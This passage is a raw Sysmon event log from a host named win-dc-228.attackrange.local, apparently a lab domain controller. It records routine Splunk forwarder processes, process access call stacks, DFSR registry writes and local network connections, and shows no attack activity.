14:08:18.393{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203697Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:18.393{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203696Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:18.393{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203695Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:18.393{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E9D2-6040-574E-00000000AD01}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203694Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:18.393{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E9D2-6040-574E-00000000AD01}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203693Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:18.269{5ABCFE62-E9D2-6040-574E-00000000AD01}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002203692Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:18.002{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F537986C10BC39C0E793DB2C16A5BC8,SHA256=6F45ABD9DC041E063ABA3EBFDD31A5C9764AF429269C7486790C03D6A5ABB343,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203725Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.987{5ABCFE62-E9D3-6040-594E-00000000AD01}54604112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203724Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.862{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E9D3-6040-594E-00000000AD01}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203723Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.862{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203722Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.862{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203721Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.862{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203720Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.862{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203719Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.862{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E9D3-6040-594E-00000000AD01}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203718Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.862{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E9D3-6040-594E-00000000AD01}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203717Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.862{5ABCFE62-E9D3-6040-594E-00000000AD01}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000002203716Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:08:19.721{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\20FED10E-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_20FED10E-0000-0000-0000-100000000000.XML 13241300x80000000000000002203715Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:08:19.721{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\0992B788-1468-4F36-93BE-112B21933E91\Config SourceDWORD (0x00000001) 13241300x80000000000000002203714Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:08:19.721{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\0992B788-1468-4F36-93BE-112B21933E91\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_0992B788-1468-4F36-93BE-112B21933E91.XML 354300x80000000000000002203713Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:15.979{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60720-false10.0.1.12-8000- 10341000x80000000000000002203712Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.315{5ABCFE62-E9D3-6040-584E-00000000AD01}8166420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203711Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.190{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E9D3-6040-584E-00000000AD01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203710Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.190{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203709Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.190{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203708Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.190{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203707Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.190{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203706Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.190{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E9D3-6040-584E-00000000AD01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203705Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.190{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E9D3-6040-584E-00000000AD01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203704Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.065{5ABCFE62-E9D3-6040-584E-00000000AD01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002203703Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:19.033{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF16AA9BAA12A0A7A56117E36BE0B90E,SHA256=AE2C88025EAF19268A24401C828A8839306D2D58CA18B9EA8BF7BE09320465CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203727Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:20.330{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EAE8BDC5040FC0F5AE17169CD28228AB,SHA256=F80DDA2A5986507A0F36808CB3B4BE8AC4158C60C03799C7D0EA451FBE7D1898,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203726Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:20.049{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCD4690788AA2585B6E31EA9BA866F75,SHA256=280B34FA3FD0947C054951FDF22F0F6E44F7A048AE770DE96080D37AFB95DD7F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203732Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:17.574{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60722-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 354300x80000000000000002203731Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 